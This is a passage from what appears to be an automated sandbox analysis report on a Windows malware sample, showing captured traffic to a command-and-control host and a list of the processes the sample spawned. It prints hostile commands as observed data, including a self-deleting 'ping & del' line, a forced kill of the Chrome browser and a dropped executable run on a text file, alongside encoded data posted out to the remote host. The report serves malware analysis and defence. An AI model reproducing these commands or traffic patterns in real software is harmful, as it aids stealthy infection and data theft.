                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:48.794214964 CET | 265 | OUT | Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 5a 71 41 6c 37 6f 41 47 6b 49 49 72 67 68 6a 57 58 33 49 71 4c 4d 7e
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVZqAl7oAGkIIrghjWX3IqLM~
Jan 29, 2021 17:38:48.865298986 CET | 266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:48 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d8ac9d532fed68827556afccc307639011611938328; expires=Sun, 28-Feb-21 16:38:48 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c08fe00001feafe098000000001
                                                                                                                                                                  Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Dl4Rc1p6KRg7Z6nRmR5OluCLpeK6Ba9C7APa3fSgd2LFvwnpp8H1kTEaMT2ZTS3jWsXjOSb8zKXZBkxwIKgMtMEnbdmJbdm5L7uJV9jNjL0VDx1NSg%3D%3D"}],"max_age":604800}
                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619462bb39ec1fea-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont
Jan 29, 2021 17:38:48.865328074 CET | 267 | IN | Data Raw: 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63
                                                                                                                                                                  Data Ascii: ent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cg
Jan 29, 2021 17:38:48.865345955 CET | 269 | IN | Data Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                  Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a
Jan 29, 2021 17:38:48.865360975 CET  270  IN
                                                                                                                                                                  Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span
Jan 29, 2021 17:38:48.865372896 CET  270  IN
                                                                                                                                                                  Data Ascii: 0
Jan 29, 2021 17:38:50.929253101 CET  280  OUT  POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:50.929301977 CET  280  OUT
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTvPnLq0jSbJdA3Ui7fMyr8~
Jan 29, 2021 17:38:50.982594967 CET  281  IN  HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:50 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d3a430303779975d28f56fa479cae297c1611938330; expires=Sun, 28-Feb-21 16:38:50 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c115600001feaf425d000000001
                                                                                                                                                                  Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=iLw946OTCvV%2FKGre4D1Lw10qYGGgZ%2Fic%2F%2FD%2Bx0hox8YM5BoEh9W%2BGMzh9TfzPfOunP7rl%2FO4Uq5kA%2B9lTH8LXko2fdi%2BDPIfKL5mxLkF5V4drTcJmw%3D%3D"}],"max_age":604800}
                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619462c88eb01fea-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta na
Jan 29, 2021 17:38:50.982636929 CET  283  IN
                                                                                                                                                                  Data Ascii: me="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-
Jan 29, 2021 17:38:50.982666969 CET  284  IN
                                                                                                                                                                  Data Ascii: olumns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by p
Jan 29, 2021 17:38:50.982695103 CET  285  IN
                                                                                                                                                                  Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="t
Jan 29, 2021 17:38:50.982716084 CET  285  IN
                                                                                                                                                                  Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
3  192.168.2.5  49730  104.21.23.16  80  C:\Users\user\Desktop\N1yprTBBXs.exe
Timestamp  kBytes transferred  Direction  Data
Jan 29, 2021 17:39:24.107032061 CET  1263  OUT  GET /info_old/ddd HTTP/1.1
                                                                                                                                                                  Host: 84CFBA021A5A6662.xyz
                                                                                                                                                                  Accept: */*
Jan 29, 2021 17:39:24.218722105 CET  1265  IN  HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:39:24 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d25830c08c40ffca102def47d10d59d851611938364; expires=Sun, 28-Feb-21 16:39:24 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c92f100004c5b9b35a000000001
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PzK5Mu7m3K5kCq%2BSGTJKpzkxGNnGcl2gZWoUayDxEDseCC%2BaipUH6ykDhQKqJyMHha2YAkvP9T%2BTj9AKv%2FcX2CtqylPHVQjYv6DkkKcnEf7GpNQucA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 61946397ed9e4c5b-AMS
                                                                                                                                                                  Data Ascii: 10d5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
Jan 29, 2021 17:39:24.218751907 CET  1266  IN
                                                                                                                                                                  Data Ascii: rt" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href=
Jan 29, 2021 17:39:24.218769073 CET  1267  IN
                                                                                                                                                                  Data Ascii: "> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending
Jan 29, 2021 17:39:24.218785048 CET  1269  IN
                                                                                                                                                                  Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13">
Jan 29, 2021 17:39:24.218796015 CET  1269  IN
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Code Manipulations

                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:33
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Users\user\Desktop\N1yprTBBXs.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:'C:\Users\user\Desktop\N1yprTBBXs.exe'
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:4999496 bytes
                                                                                                                                                                  MD5 hash:F7D7C89F3F5CBC925480B46B7B934157
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.264281682.0000000002750000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                  Reputation:low

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:37
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                                  Imagebase:0xe80000
                                                                                                                                                                  File size:59904 bytes
                                                                                                                                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:40
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:4999496 bytes
                                                                                                                                                                  MD5 hash:F7D7C89F3F5CBC925480B46B7B934157
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000002.00000002.350264468.0000000002880000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                  • Detection: 22%, Metadefender, Browse
                                                                                                                                                                  • Detection: 59%, ReversingLabs
                                                                                                                                                                  Reputation:low

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:39
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0B37D2846804C02059732A6A10D93625 C
                                                                                                                                                                  Imagebase:0xe80000
                                                                                                                                                                  File size:59904 bytes
                                                                                                                                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:41
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:4999496 bytes
                                                                                                                                                                  MD5 hash:F7D7C89F3F5CBC925480B46B7B934157
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.278675442.0000000002730000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                  Reputation:low

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:41
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'
                                                                                                                                                                  Imagebase:0x12a0000
                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:42
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:43
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                                                                  File size:18944 bytes
                                                                                                                                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:47
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\1611970727133.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt'
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:103632 bytes
                                                                                                                                                                  MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 3%, Metadefender, Browse
                                                                                                                                                                  • Detection: 14%, ReversingLabs
                                                                                                                                                                  Reputation:low

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:48
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                  Imagebase:0x12a0000
                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:50
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:50
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
                                                                                                                                                                  Imagebase:0x12a0000
                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:50
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:taskkill /f /im chrome.exe
                                                                                                                                                                  Imagebase:0x1320000
                                                                                                                                                                  File size:74752 bytes
                                                                                                                                                                  MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:50
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:38:51
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                  Imagebase:0xe10000
                                                                                                                                                                  File size:18944 bytes
                                                                                                                                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:39:17
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                                  Imagebase:0xb10000
                                                                                                                                                                  File size:73160 bytes
                                                                                                                                                                  MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 0%, Metadefender
                                                                                                                                                                  • Detection: 2%, ReversingLabs

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:39:23
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
                                                                                                                                                                  Imagebase:0x12a0000
                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:39:25
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:39:25
                                                                                                                                                                  Start date:29/01/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                  Imagebase:0xe10000
                                                                                                                                                                  File size:18944 bytes
                                                                                                                                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Code Analysis

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004F0B92
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004F0BC9
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004F0C02
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?), ref: 004F0C1B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$AllocChangeCloseCreateFindNotificationReadVirtual
                                                                                                                                                                    • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
                                                                                                                                                                    • API String ID: 4254367219-3199432782
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 004F0C58
                                                                                                                                                                    • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004F0CF3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocExitProcessUserVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2898551851-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000000), ref: 004F187D
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000000,?,?), ref: 004F1725
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,00000000,?,?), ref: 004F1725
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000065,00000000,00001000,00000004,?,004F120D,?,?), ref: 004F158A
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004F11C0
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
